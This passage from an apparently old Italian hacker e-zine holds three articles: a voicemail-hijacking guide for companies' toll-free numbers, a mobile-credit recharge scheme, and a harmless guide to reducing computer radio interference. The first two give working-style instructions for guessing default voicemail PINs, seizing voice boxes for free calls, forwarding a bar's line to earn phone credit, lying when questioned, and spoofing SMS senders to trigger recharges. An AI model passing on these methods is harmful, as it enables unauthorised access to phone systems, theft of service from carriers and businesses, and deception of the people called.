registrata... le segreterie a multi casella, invece, sono delle segreterie con pi- di una casella vocale... ci vuol dire ke si possono avere pi- "padroni" perk ci sono pi- caselle da governare... cosikk si possono creare comunit di pi- utenti ke si skambiano messaggi... queste segreterie sono pi- avanzate... e quindi pi- complicate... a volte sono piene zeppe di men- vocali ke nemmeno io riesko a rikordare... a volte bisogna scriverseli... molto spesso kueste segreterie sono utili anke per fare kiamate gratuite... ma andiamo avanti... - 04 - Come agire Bene... una volta kiamato un numero verde bisogna fare delle prove... ora vi spiego... per prima kosa kiamate esklusivamente in orari non di ufficio, e cio, dopo le 18.30... a volte anke alle 19.00... io veramente lo faccio dopo le 21.00 perk coincide proprio coll'orario ke sto seduto al cesso col cell di mia madre... HEHEHEH.... allora, una volta composto il numero aspettate fino a quando non sentirete voci o segnali... se dopo un po'di squilli non risponde niente o se invece sentirete la vocina da castrato della telekozz ke dice: "Kakkio! Avete kiamato in orario..." (Veramente kakkio non lo dice...), lasciate perdere perk sikuramente il numero stakkato per motivi di soldi!!! Se kiamate da cell e dice ke la kiamata proviene da un'area non abilitata, lasciate perdere e provate da kabina... se ankora, quando kiamate vi dikono: "... vi sar passato un operatore..." oppure sentite direttamente: "Pronto sono Asdrubale, come posso aiutarla..." attakkate immediatamente perk i pezzenti ke avete kiamato non vanno mai a dormire... ke koglioni... quando finalmente prendete la linea, nella maggiorparte dei casi sentire una voce ke avverte ke avete kiamato in orario non di ufficio... ora bisogna accertarsi se esiste una segreteria, anke se non attivata... quindi per prima kosa aspettate e sentite per intero il messaggio... una volta finito se stakka immediatamente, rikiamate... se invece vi si presenta un men- ankora meglio... se invece vi dikono di lasciare un messaggio in segreteria potrete esultare a piacimento e, volendo, farvi dei pompini da soli anke se risulterebbe molto difficile... oki andiamo per ordine: tentate di avvicinare il vostro capo alla zona pubica... ehm... skusate... oki andiamo per ordine: se vi riattakka, rikiamate e premete per prima kosa cancelletto o diesis (#)... ascoltate kosa dice... se non dice niente allora provate con asterisko (*)... ascoltate kosa dice... se neanke kuello fa niente allora premete a kazzo tutti i tasti della tastiera... E KE KAKKIO!!! bene, se al premere del cancelletto sentite qualkosa di nuovo tipo: "Inserire il codice di identificazione..." oppure "Inserire il numero di casella vocale..." siete a kavallo e potete anke tentare, senza esiti konkreti, di suonare una melodia con vari scorreggi uscenti dal vostro ano... se vi si presenta un men- siete forse gi entrati nella segreteria... ma bisogna aspettare e ascoltare tutto ci ke dice... se vi dice di lasciare un messaggio, dite kualkosa di infinitamente stupido e premete cencelletto... forse dopo potrete entrare nella segreteria... Tutto potrebbe sembrare un po'confusionario, ma rikordate ke sar tutto pi- semplice provando pratikamente... - 05 - Una volta individuata Allora se vi trovate ke dovete immettere un kodice, tipo un PIN, nella maggiorparte dei kasi sar sikuramente di 4 cifre... non solo perk il kodice deve essere abbastanza corto da essere rikordato dagli inetti ke lavorano alla segreteria... ma anke perk usato spesso... bene... ora kapite bene ke nella stragrande maggiorparte dei kasi il kodice 1234, usato standard in molte segreterie... non sar certo una novit... seguono a secondo e terzo posto di popolarit 0000 e 1111... se non vanno bene anke kuesti provate altre composizioni semplici... tipo 5555 o 9876... successivamente il kodice deve essere cambiato... il fatto sta ke nel mondo esistono molti pi- mentekatti di quanti ne possiamo immaginare... rabbrividiamo... brrrrrr.... - 06 - Cosa ne faccio??? Un kazzo potrei dirvi... ma invece gli usi sono molti!!! Se una segreteria mono-casella potete usarla per iniziare a capire come funzia il gioko del conquistare segreterie... infatti ne potete fare un uso proprio... cio voi date il numero agli amici e loro vi lasciano messaggi ke poi potrete ascoltare... inxomma proprio kome una segreteria ma su numero verde... quindi completamente gratiz!!! Mentre se avete trovato una segreteria multi-casella... il gioko si fa pesantuccio perk esistono metodi per fare uscire chiamate verso altri numeri partendo dal numero verde... ehehehehhe ma questo cambia da segreteria a segreteria e quindi vi conviene lavorarci sopra parekkio... - 07 - I riski Bene, dopo essermi documentato ben ben sono arrivato ad una conclusione nel caso dell'illegalit di questi metodi... il fatto ke non esisterebbe nessuna legislazione ke ci impedisce di utilizzare una segreteria su numero verde... naturalmente se la ditta a kui avete fottuto la segreteria vedendo nel tabulato delle kiamate al numero vede ke la maggiorparte delle kiamate proviene dallo stesso numero e vede anke ke il 90% del traffiko lo avete ausato voi... potrebbe anke fare una denuncia... comunque voi agite per lo pi- da kabina... e poi non abbiate mai paura... - 08 - Ne potevi fare a meno??? Kredo proprio di si... komunque sono contento di essere ritornato di nuovo nell'ambiente underground digitale e cyberpunk, e spero di continuare a scrivere in queste e anke in altre riviste... * Note sull'autore * mR_bIs0n nato a a Santo Billo alla Pozzanghera nel 1984 (come aveva sempre desiderato). Ha scritto molti artikoli per varie riviste, a volte senza esserne consapevole. Partecipa ad eventi del tipo "La sagra del Prepuzio fritto" e "Fiera degli spazzolini da denti". E'stato pi- volte sposato. Le mogli non lo sapevano. ---mR_bIs0n--- (-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)= RICARICARSI IL CELLULARE O ALMENO PROVARCI AUTORE: Screener_it E-MAIL: screener_it@freemail.it WEB-SITE: http://go.to/tankcommandos ICQ: 35140176 SCRITTO IL: 04 settembre MUSICA: The Coors - Forgiven, not Forgotten (-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)= Ciao belli !!!! Vi scrivo questo articoletto da un posto un po' particolare. Sapete dov' l'Irlanda ? Quell'isola a nord dell'Europa.. Ecco, io vi sto scrivendo da Dublino, che la capitale dell'Irlanda.. Che volete di pi ? Vi faccio anche le lezioni di geografia comprese nel prezzo !!! Un giorno vi racconter tutti i particolari di queste 2 settimane in terra straniera.. Per chi se lo chiedesse sono andato all'estero to improved my english !! Colgo l'occasione per salutare Daniele (e tagliati il pizzetto che sembri una pecora !!) e Andrea di Brescia (cos' che ti mancava di pi dell'Italia ? Il fumo ?) che ho conosciuto entrambi qui. CIAO A TUTTI DUE !!! Un saluto particolarissimo a Ximo, un ragazzo spagnolo che abitava nella mia stessa casa !! Quest'oggi come avrete capito dal titolo vi parler di come ricaricare i cellulari in maniera + o - legale.. Questo argomento stato argomento di numerossisime serate passate in chat. Vi dico subito che sull'argomento girano vere e proprie leggende urbane.. Io ho addirittura sentito uno che chiedeva:"Scusate, sapete qual' il green a cui telefoni e ti ricaricano gratis il cellulare ?". Se c' un green che ricarica il cellulare mi metto a correre da Milano a Roma completamente nudo !!! Per ricaricare un cellulare al momento conosco solo i metodi, se ne conoscete altri mailatemi pure, sar pi che felice di mettere anche le vostre aggiunte (e i vostri nomi) sul txt. /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ \==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/ Primo metodo per ricaricare il cellulare: andare in edicola e comprare/rubare una ricarica per il vostro cellulare.. Non credo che ci sia bisogno di dire che questo metodo mi f schifo !! Il solo pensiero di dover sganciare 60 karte per la ricarica o dover fare una corsa con il cuore in gola per scappare all'edicolante impazzito di rabbia mi girano i coglioni.. Quindi metodo subito scartato !! Un altro metodo il trasferimento di chiamata applicato al cellulare.. 'Spetta che spiego meglio !! Premetto che questo metodo l'abbiamo inventato io e XXXXX (scusa ma non ricordo proprio il tuo nick n riesco a trovare il log della nostra discussione su #Phreak.it). Testato su cellulari TIM con l'opzione AUTORICARICA 190, per gli Omnitel e Wind non v. Dunque.. Il trucco del trasferimento di chiamata lo conoscete (chi non lo conosce vada nella sez. TESTI DEGLI ALTRI del sito del Tank Commandos e trover il testo "Truffa telefonica con il trasferimento di chiamata"). L'unica cosa che dovete cambiare che come numero di destinazione metterete il numero del vostro cellulare. Ogni chiamata che sar fatta al bar vi verr trasferita al cellulare e per ogni minuto di telefonata riceverete mi pare 70 che non male.. Quando vi chiamano chiedendovi se siete il tal barista dite che la sua linea deve avere qualche problema xk continuate a ricevere voi le chiamate dirette a lui e non riuscite a spiegarvene il perch. Se vi chiedono chi siete mi pare logico che darete dati falsi e dite che abitate in paesi lontani (se vi chiamano da Verona dite che siete di Milano, ecc..). C' poi il metodo di MYGSMBOX.com che mi venuto in mente qui in Irlanda ma devo ancora testarlo. Come ben sapete (e chi non lo sa lo sapr adesso) spedendo i messaggi SMS con MYGSMBOX.com potete fare in modo che come numero del mittente appaia qualsiasi numero di cellulare vogliate, al contrario ad esempio di Kataweb, iol.it, ecc.. che mettono come numero di origine numeri standard come 2424 o altro, adesso non mi ricordo con precisione.. Cmq iscrivetevi a MYGSMBOX.com e mettete con numero del vostro cellulare un qualsiasi numero TIM (033X XXX XXXX) e poi, sempre ammesso che abbiate attivo il servizio di AUTORICARICA 190, speditevi i messaggini e ricaricatevi di 25 per ogni messaggio. L'ultimo consiglio che posso darvi per ricaricarvi il cellulare nel modo + legale il possibile (non siamo mica ladri approfittatori noi, quella della TIM per s !!) andare su http://216.221.175.58/cgi-bin/affiliate/ad.cgi?id=tank e poi cliccare sui banner "Clicca qui e ricaricati il cellulare". Quest'ultimo trucco "supporta" finanziariamente Screener_it, quindi se volete che continuo a scrivere gli articoli vedete di visitarlo in tanti e per tante volte !!! Tanto lo sapete che continuo a scrivere lo stesso (anche se molti di voi non lo vogliono) :-)) /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ \==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/ Screener_it & Tank Commandos Crew screener_it@freemail.it http://go.to/tankcommandos DEDICATED: - Tutti quelli che c'erano in Irlanda con me e a tutti gli italiani che ho incontrato e conosciuto in Irlanda !! Ciao ragazzi !! ===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Elettronica=--====ooO===0===Ooo===oOOo===ooO===0=== 1. Notizie Data: 30 Gennaio 1994 Release: 1.4 2. Introduzione Uno dei maggiori problemi nell'utilizzo dei computer in connubio agli apparecchi radio, sia esso per scopi di controllo o per la decodifica di segnali, consiste nell'ammontare di RFI (Radio Frequency Interference, cio interferenza a radio frequenza) generata da queste macchine. La maggior parte delle volte l'interferenza generata abbastanza elevata da rendere inutilizzabili determinate bande di frequenza, coprendo i segnali pi deboli e distorcendo o interferendo con i segnali desiderati. Questo comportamento del tutto inaccettabile quando si opera nei modi di trasmissione digitali, ed a volte perfino per l'utilizzo in CW (trasmissione in codice morse). Ecco perch il come ridurre o eliminare i disturbi a radio frequenza rappresenta una delle domande pi frequenti. La brutta notizia che, a quanto ne so, nella maggior parte dei casi non esiste alcun modo per rimuovere completamente le interferenze a radio frequenza generate dai computer. La buona notizia invece che esistono dei ben definiti approcci da intraprendere per ridurre le interferenze a livelli molto pi accettabili e, in alcuni casi, a livelli del tutto trascurabili. Questo documento contiene una collezione di suggerimenti provenienti da varie fonti e la descrizione di alcune operazioni da me effettuate sul mio sistema per risolvere il problema in oggetto. Molti dei documenti da me esaminati si riferiscono alla parte trasmittente, e riportano vari suggerimenti da mettere in atto per impedire ai trasmettitori di generare RFI; questo documento invece concepito dal punto di vista della ricezione, contiene cio dei suggerimenti per impedire ai ricevitori di essere disturbati dalle sorgenti di interferenze a radio frequenza. Suppongo che la maggioranza di voi abbia gi tentato i passi basilari per tentare di migliorare la ricezione dei segnali, per esempio spostando il ricevitore e l'antenna il pi possibile, sia fisicamente che elettricamente, dalle sorgenti di RFI (computer e monitor nel nostro caso), ma sono anche cosciente del fatto che a volte ci siano delle limitazioni e costrizioni a riguardo della distanza massima a cui si pu arrivare. Potreste anche aver provato a modificare l'orientamento del computer, del monitor, del ricevitore e delle antenne e dei cavi nel tentativo di migliorare la situazione. Fatto ci, cos'altro si pu fare? E' la stessa domanda che mi sono posto a suo tempo, ecco perch ho scritto questo documento. Ovviamente, sebbene abbia fatto del mio meglio per presentare le seguenti informazioni nella migliore integrit, declino ogni responsabilit per eventuali incidenti o danneggiamenti causati da errodi e omissioni nelle informazioni qui in appresso riportate. 3. Sorgenti di RFI Prima di iniziare ad affrontare realmente il problema, potrebbe essere interessante essere a conoscenza dei motivi per cui i computer generano interferenze a radio frequenza, e del modo in cui queste interferenze riescano ad entrare nel ricevitore. I due componenti principali del computer sono costituiti dall'unit centrale e dal monitor (per semplicit di descrizione). Il computer funziona ad un certo clock, determinato dall'oscillatore interno; la maggior parte delle volte le frequenze di oscillazione si aggirano sui 4.77 mHz, 8 mHz, 12 mHz, 16 mHz, 20 mHz, 25 mHz, 33 mHz, 40 mHz, 50 mHz, 66 mHz e 80 mHz. Ovviamente questa non l'unica frequenza generata, in quanto sulla scheda video presente almeno un altro oscillatore, a cui si aggiungono quelli presenti sulle altre schede. Come potete constatare, tutte queste frequenze ricadono nelle bande HF e L-VHF, e possono ovviamente interferire con i segnali che vorremmo ricevere. A peggiorare ulteriormente la situazione, queste frequenze sono di solito divise per da appositi circuiti all'interno del computer, per generare un certo numero di altre frequenze. Poich il computer un sistema digitale, la forma d'onda caratteristica di questi segnali l'onda quadra, che come noto contiene una infinit di armoniche. Anche la scheda video genera interferenze a radio frequenza in quanto il data-pixel-rate spesso abbastanza elevato da ricadere nelle bande HF. Per tutte queste ragioni i computer e i monitor sono i migliori candidati se desiderate un perfetto generatore di RFI. La situazione viene spesso peggiorata dai computer dotati di economici case in plastica, che non sono assolutamente in grado di schermare seppur minimamente il sistema. Molta gente sostiene che i monitor costituiscano una delle principali sorgenti di RFI, la qual cosa tutt'altro che priva di fondamento. Ho notato che anche le tastiere per PC generano una considerevole quantit di interferenze a radio frequenza, nonostante il loro aspetto innocente; il motivo di tutto questo risiede nel microprocessore montato sulla loro scheda, il cui funzionamento basato su una freuqneza di clock che si aggira sui 3 MHz. Il problema viene aggravato dal modo in cui il circuito stampato della tastiera costituito, che lo rende un discreto radiatore di antenna a loop e quindi le armoniche possono essere ascoltate anche nell'intervallo circostante la seconda e terza armonica. Il monitor probabilmente monta sulle proprie schede un quarzo di circa 14.316 MHz, quindi con molta probabilit troverete su tale frequenza una portante di forte intensit. La prima cosa da stabilire l'ammontare di RFI generata dall'unit centrale e dal monitor; possibile che l'unit centrale non irradi alcun segnale, ma il colpevole sia il monitor, o viceversa. Per accertarsene sufficiente spegnere il monitor e lasciare accesa l'unit centrale, controllando il livello di interferenze ricevuto dalla radio. Ecco qui di seguito la procedura suggerita: Effettuate una veloce scansione della bande per trovare il punto in cui le interferenze sono pi forti. Questa operazione risulta utile perch se riusciamo a ridurre la RFI su questa frequenza, dovrebbe normalmente verificarsi una corrispondente riduzione della RFI anche su altre frequenze, sebbene ci non sempre si verifichi. Scollegate il mouse, i cavi seriali e i cavi della stampante, il cavo della tastiera, il cavo del segnale video del monitor, e il cavo di alimentazione del monitor. Se possibile, per il momento fate funzionare il ricevitore a batterie. Ora accendete il computer e controllate se le interferenze a radio frequenza sono diminuite di un valore apprezzabile. Con il computer acceso, ricollegate la tastiera, quindi il mouse, quindi i cavi seriali, i cavi paralleli, il cavo video, il cavo di alimentazione del monitor (ma lasciate il monitor spento per ora). Mentre riconnettete i cavi, controllate se eventualmente si verifica un aumento di RFI; se fortunatamente nessuna di queste operazioni di riconnessione produce un apprezzabile aumento di RFI, allora potete considerarvi fortunati. Accendete il monitor e controllate l'aumento della RFI; fate funzionare il monitor sia in modo testo che nei vari modi grafici, per vedere se la RFI viene influenzata. Alimentate la radio tramite l'alimentatore e di nuovo notate l'eventuale aumento di RFI. Sconnettete la radio da qualunque antenna, sia essa esterna o interna, e notate se la RFI sparisce. Notate che su alcune radio, quando si stacca il connettore dell'antenna esterna, viene automaticamente abilitata l'antenna interna; per evitarlo, inserite un connettore nella presa d'antenna. Arrivati a questo punto dovreste avere una buona idea dei componenti che contribuiscono a generare RFI; conservate questi appunti, mentre ci accingiamo ad esaminare un altro punto, le vie percorse dalla RFI per entrare nel ricevitore. Earl Morse KZ8E suggerisce questa procedura per identificare il punto esatto dove viene generata la RFI: "Nel caso in cui le procedure descritte in precedenza non portino ad alcun successo, dovrete investigare sulla radiofrequenza emessa dal cabinet del monitor e del computer. Costruite un loop con uno spezzone di cavo RG58, rivoltando la schermatura verso l'indietro per 10 cm circa e creando con il conduttore centrale una coppia di spire del diametro compreso tra 3 e 5 cm; saldate il conduttore centrale alla schermatura, nel punto in cui avete provveduto a rivoltarla verso l'indietro. Collegate l'altra estremit del cavo al ricevitore ed utilizzate la sonda cos costruita per ricercare la fonte di RFI. Un cabinet per computer non schermato a dovere pu essere facilmente racchiuso con treccia di rame o altri materiali conduttivi. Lo schermaggio del cabinet di un monitor presenta difficolt leggermente maggiori e potrebbe causare problemi di sicurezza (alta tensione) o di sovrariscaldamento." Se trovate eccessivamente difficoltoso il metodo sopra descritto, procuratevi semplicemente un ricevitore portatile per onde medie e corte alimentato a batterie e dotato di antenna interna in ferrite, ed iniziate a muovervi nei dintorni, ruotando il ricevitore radio man mano che procedete. Spesso possibile individuare con precisione le pi forti sorgenti RFI semplicemente spostandosi con la radio verso il punto dove il rumore si ascolta con maggiore intensit. Naturalmente, la radio deve essere sintonizzata in una parte dello spettro in cui sia gi possibile in qualche modo ascoltare la RFI; effettuate tale operazione con la radio posizionata vicino all'apparecchio sospetto e poi raffinate la sintonia. E' cos possibile avere idea del tipo di RFI presente e la frequenza su cui focalizzata. 4. Come la RFI raggiunge il ricevitore La RFI generata da una sorgente raggiunge il ricevitore attraverso strade diverse, che possono essere rappresentate dall'alimentatore, dalla connessione di "terra" dell'alimentatore, attraverso l'emissione radio diretta, o addirittura attraverso la "schermatura" che potrebbe essere stata mal progettata, o utilizzata in modo non idoneo. In queste situazioni si presentano un certo numero di casi da trattare. Se, arrivati al punto (6) della lista precedente, la vostra radio ancora influenzata dalla RFI pur senza alcuna antenna collegata, allora la schermatura del vostro ricevitore scadente. Se, arrivati al punto (5) della lista, la RFI cresce nel momento in cui la radio viene ricollegata alla rete elettrica o all'alimentatore, allora la RFI entra attraverso le connessioni di alimentazione. Se la radio collegata direttamente o indirettamente al computer attraverso la porta seriale o una qualche altra interfaccia, anche quella potrebbe essere una potenziale via di ingresso per la RFI; potete scoprire se il vostro problema dipende dalle connessioni seriali seguendo la procedura descritta al punto (3) della precedente lista. Se la RFI cresce in modo apprezzabile riconnettendo l'antenna esterna, allora segno che la RFI potrebbe arrivare via radio o essere raccolta dal cavo dell'antenna. Ricordate che in molti casi la RFI proviene da pi di una strada, e che perci importante controllare tutte le possibilit. D'altro canto, se una sola delle vie di accesso quella che solo quella. Altre misure preventive consistono nel tenere i cavi e le connessioni pi corte possibile, in modo da impedire che si trasformino in elementi radianti per la RFI generata dall'apparecchio. Se possibile, collegate la vostra radio ad un differente circuito di alimentazione ma fate attenzione ai collegamenti di terra, in modo da evitare il formarsi di pericolosi potenziali elettrici. 5. Come eliminare la RFI Come potrete probabilmente constatare, la RFI una combinazione di problemi e non un problema unico. I problemi possono essere classificati in 3 categorie: Problemi di schermaggio Problemi di filtraggio Problemi di progettazione Non si tratta ovviamente di categorie ben definite, ma la suddivisione stata fatta per semplicit. In molti casi, un cattivo schermaggio la prima cosa da sospettare, e pertanto questo il primo argomento che prenderemo in esame. Passiamo ai fatti. 6. Problemi di schermaggio Quando parliamo di schermaggio, ci sono quattro aspetti da considerare: la radio stessa, il monitor, l'unit centrale e la combinazione antenna/cavo. Uno schermaggio insufficiente pu dipendere benissimo da una cattiva progettazione di uno degli apparecchi sopra citati, ma pu anche essere causato anche da connettori sporchi o componenti vecchi. Esaminate gli apparecchi per assicurarvi che tutte le connessioni siano solide, in particolar modo le connessioni della massa dell'antenna, dell'alimentatore della radio, del case dell'unit centrale, e dei cavi in genere. Assicuratevi che i cavi non siano vecchi e che tutte le connessioni siano pulite, senza ossido sulle superfici. La presenza di ossido impedisce un buon contatto elettrico ed in alcuni casi produce la rettificazione dei segnali, cosa che pu portare alla generazione di segnali fantasma o altri problemi. Se, effettuando le operazioni descritte al punto (6) della lista riportata nel capitolo sulle sorgenti RFI, avete appurato che il vostro problema causato da una scadente schermatura della radio, del monitor o dell'unit centrale, causato da problemi di progettazione, allora occorre costruire uno schermaggio adeguato. Questo scopo si pu raggiungere utilizzando alluminio da cucina o spray conduttivo; l'idea quella di foderare il contenitore degli apparecchi in modo da schermarli con una barriera contro la RFI. L'operazione va effettuata con attenzione in quanto, essendo lo schermaggio conduttivo, possibile mettere accidentalmente qualcosa in corto circuito e bruciare la vostra radio o qualunque altro apparecchio che state tentando di schermare. Lo spray rappresenta probabilmente la migliore soluzione, ma anche la pi costosa. A mio parere l'alluminio da cucina fornisce probabilmente la migliore schermatura, ma anche il pi difficile da applicare. Lo spray o la vernice conduttiva presenta una minore conduttivit ma si distribuisce pi uniformemente ed arriva pi facilmente nei posti meno accessibili. Ci che dovrete fare rimuovere il coperchio in plastica della radio o del monitor, ponendo attenzione ai cablaggi ed ai contatti elettrici, e ricordando che l'apertura del contenitore quasi certamente invalider la garanzia dell'apparecchio. Pulite con cura le parti interne del contenitore ed assicuratevi che sia asciutto e non ci sia polvere o grasso sulle superfici prima di applicare lo spray; potrebbe essere necessario applicare pi di uno strato per raggiungere una migliore schermatura. Assicuratevi che in qualche punto del contenitore, la vernice spray applicata venga a contatto con la massa dell'apparecchio; ricordate che nei monitor, lo chassis non sempre connesso alla massa, perci controllate questo particolare prima di procedere. Per realizzare una schermatura efficiente necessario che la copertura sia il pi possibile completa, ma fate attenzione a non spruzzare lo spray su commutatori o qualunque altro componente che potrebbe causare un corto circuito, ed evitate di coprire le fessure per la ventilazione. A questo punto potreste chiedervi come schermare la parte anteriore del tubo catodico, quella dove appare l'immagine: nella maggioranza dei monitor a colori, la maschera presente all'interno del monitor agisce proprio come uno schermo. Prima di rimontare i coperchi, attendete che la vernice si asciughi; provate ad assicurare una buona massa per lo schermo, facendo attenzione a non asportare la vernice. Nel caso dovessero verificarsi formazioni di archi elettrici, coprite l'area interessata con del nastro isolante. Il tipo di spray che utilizzo noto come EMI-LAC o EMV-LACK (prodotto in Germania dalla Cramolin), ma sono in commercio molti altri prodotti similari che dovrebbero svolgere lo stesso lavoro. Nel caso non riusciate a reperire vernice, spray o un adatto foglio di alluminio, anche il nastro adesivo ricoperto di metallo conduttivo pu servire allo scopo. Ricordate, lo schermo conduttivo NON deve assolutamente venire a contatto con i componenti; ponete estrema attenzione a tale particolare, in quanto esiste sempre il pericolo di scosse elettriche quando si mettono le mani nei monitor. Evitate di effettuare da soli questo tipo di operazione a meno che non siete assolutamente certi di quello che vi accingete a fare. Ecco cosa Gary Coffman KE4ZV ha da suggerire riguardo allo schermaggio: "Se il colpevole il monitor, sono in commercio degli spray conduttivi che possono essere spruzzati sulla parte interna del cabinet in plastica, per tentare di ridurre to ridurre l'irradiazione di segnali. La GC Electronics ne produce uno che funziona bene. Dovrete smontare il coperchio posteriore del monitor e spruzzare lo spray sulla superficie del coperchio; naturalmente preferibile spruzzare lo spray sulla superfiche interna, per non guastare l'estetica del monitor. Quando rimontate il coperchio, assicuratevi che la sezione ad alta tensione del monitor si trovi a distanza adeguata dal coperchio che ora conduce corrente; in caso contrario, incollate un pezzo di carta oleata (quella utilizzata per avvolgere i salumi o il pesce) nei punti appropriati, per evitare scariche ad arco. Eccetto per il caso in cui il monitor sia uno con chassis collegato alla tensione di rete, fate venire a contatto la copertura conduttiva con lo chassis, e collegate un cavo dallo chassis alla presa di terra della vostra stanza. Se il monitor a colori, la maschera shadow nel tubo catodico costituisce gi di per se' un'adeguato schermaggio, ma se si tratta di un monitor monocromatico, allora potrebbe essere necessario schermare la superficie frontale del tubo catodico spruzzando un leggerissimo strato di vernice al rame; spruzzatela fino a creare un sottile velo di color nero, che funger anche da schermo antiriflesso. Se avete appurato che il cavo del segnale video del monitor irradia RFI, per prima cosa assicuratevi che il cavo utilizzato sia schermato, e quindi utilizzate qualche nucleo di ferrite sul cavo; consigliabile montare questi nuclei su *ogni* cavo esterno. Se invece il colpevole il PC, graffiate la vernice circostante le viti in modo tale che le varie parti componenti il case siano ben collegate elettricamente, e aggiungete ulteriori viti in modo tale che ogni giunzione abbia almeno una vite ogni 5 cm lungo tutta la sua lunghezza; questo ci che serve per creare una buona gabbia di Faraday. Ogni apertura del case dovrebbe essere ricoperta con treccia di rame schermante; l'apertura del drive floppy rappresenta un problema: non possibile ricoprirla poich sarebbe poi impossibile accedere al drive. Il miglior modo per aggirare il problema consiste nel schermare l'intero alloggiamento del drive dall'interno e ed accettare eventuali disturbi generati dal drive quando in funzione. Non dimenticate di collegare un cavo dal case alla presa di terra della vostra stanza. Naturalmente, risulta sempre di grande aiuto posizionare l'antenna della radio il pi possibile distante dal PC, e collegare l'antenna alla radio tramite un cavo coassiale ben schermato. Lo chassis della radio dovrebbe essere collegato ad una buona presa di terra. Se utilizzate un HT (me ne dispiace) allora potrebbe essere necessario collocare la radio ed il TNC distanti dal PC, collegando quest'ultimo al PC tramite un lungo cavo RS232; si noti che anche il TNC potrebbe essere una sorgente di rumore. In alcuni casi meglio lasciare il TNC vicino al computer e collocare la radio a distanza, collegandola al PC con lunghi cavi audio e di controllo. Il TNC inoltre dovrebbe essere trattato allo stesso modo del PC; graffiate la vernice nei punti dove sono montate le viti, ed aggiungetene delle altre per migliorare il collegamento a massa del contenitore. Se invece il contenitore in plastica, allora o verniciate la parte interna con spray conduttivo, oppure lo montate in un contenitore metallico." Se utilizzate lo spray, assicuratevi di applicarne uno strato il pi uniforme possibile, e ripetete il procedimento alcune volte al fine di ottenere un migliore schermaggio. Non sprecate troppo spray su un punto, ma assicuratevi che la copertura non presenti delle aree troppo "sottili". Lo stesso metodo pu essere applicato al case dell'unit centrale o al contenitore della tastiera. L'efficacia di un tale metodo sulla tastiera comunque discutibile, vista la difficolt di costruira una adeguata gabbia di Faraday attorno alla circuitazione che genera RFI; occorre inoltre agire con molta cura per evitare di causare eventuali cortocircuiti, vista le dimensioni molto ridotte della maggioranza delle tastiere. Anche lo schermaggio dei cavi molto importante; assicuratevi che il cavo del segnale video sia dotato di una buona schermatura; lo stesso dicasi per i cavi seriali e paralleli e, naturalmente, anche il cavo d'antenna deve essere adeguatamente schermato. Per i cavi d'antenna evitate l'utilizzo dei cavi coassiali TV a 75 Ohm, poich questi in genere non garantiscono una schermatura sufficiente. Provate invece un cavo tipo RG-58-C/U (che a mio parere garantisce una schermatura migliore rispetto al tipo RG-58-A/U) o un qualche altro tipo di cavo ad elevata schermatura come RG-8 e similari. Una discesa di antenna ben schermata contribuisce enormemente a ridurre la RFI. Ho anche sentito che tutti gli apparecchi dovrebbero essere collegati ad una buona presa di terra attraverso un cavo o treccia di grosso diametro; il suggerimento risponde probabilmente a verit e, se avete la possibilit di metterlo in pratica, perch non farlo. Per collegare i cavi d'antenna alla radio, utilizzate preferibilmente dei connettori appropriati, come il PL-259 o qualcosa di similare. In tutti i casi, assicurate una buona terra alla schermatura; una discesa di antenna ben schermata pu in alcuni casi eliminare fino all'80% della RFI, o ancora di pi. Ad ogni modo, se effettuate ascolto sulle bande VHF e UHF, la lunghezza del cavo di discesa dell'antenna andrebbe soppesata contro le perdite di segnale provocate dalla discesa stessa. Cavi tipo il 9913 presentano delle perdite molto basse, ma per contro sono abbastanza costosi; ad ogni modo, se potete affrontare la spesa, non esitate ad utilizzarli. Personalmente trovo che il tipo RG-58 sia il tipo di cavo con cui pi semplice lavorare. Alcune volte, in alcune unit centrali, potrebbero esserci alcuni componenti difficili da schermare, come ad esempio il drive per i dischetti; questo non un problema serio, visto che il drive non operativo per la maggioranza del tempo, ma se proprio avete deciso di tentare anche lo schermaggio del drive, ricordate che tutto lo schermo deve essere ben collegato elettricamente. Lo stesso dicasi per il resto del case del computer; se possibile, utilizzatene uno dotato di un adeguato schermaggio in metallo su tutta la superficie. Il nostro obiettivo quello di ottenere una buona gabbia di Faraday, cosi che l'intero case sia ben schermato; graffiate la vernice presente sotto le viti, in modo che ci sia un buon contatto elettrico dappertutto. Anche altri connettori esposti e splitters (che sono comunque sconsigliati) possono contribuire all'ingresso della RFI, pertanto sarebbe consigliabile controllare anche il loro schermaggio. 7. Problemi di filtraggio I circuiti di alimentazione rappresentano in senso di importanza la successiva via d'ingresso per la RFI. In alcuni apparecchi mal progettati, la RFI non viene filtrata in modo adeguato nei circuiti di alimentazione del computer o del monitor e quindi riesce ad infiltrarsi nella rete elettrica e da l nell'alimentatore della radio, per raggiungere poi la sezione RF (o a volte anche la sezione AF) del ricevitore. Questo tipo di problemi pu essere normalmente ridotto utilizzando un filtro di linea per gli alimentatori degli apparecchi interessati; assicuratevi che il filtro di linea sia idoneo a supportare il carico di corrente che deve scorrere attraverso il cavo, altrimenti potrebbe bruciarsi. Esiste in commercio un tipo di filtro di linea che essenzialmente costituito da una presa da sostituire a quella presente nell'alimentatore; non sono a conoscenza del grado di miglioramento apportato da questo tipo di filtro, ma se decidete di intraprendere un tale approccio, fatelo con cura! Oltre ad usare filtri di linea, anche possibile utilizzare perline di ferrite e toroidi su pressoch tutte le linee; procuratevi un mucchietto di questo materiale e sperimentate. Potreste anche provare a mettere alcune perline di ferrite sul cavo di discesa dell'antenna, che fungeranno da balun ed impediranno alla RFI di viaggiare sulla calza di schermo del cavo. Esistono in commercio molti tipi di nuclei RF in ferrite, modelli "clip on" e modelli gi precostruiti, che possono essere utilizzati. L'Handbook ARRL descrive alcuni di questi dispositivi. Mi sono autocostruito un balun 4:1 (BAL-anced to UN-balanced) per la discesa coassiale della mia 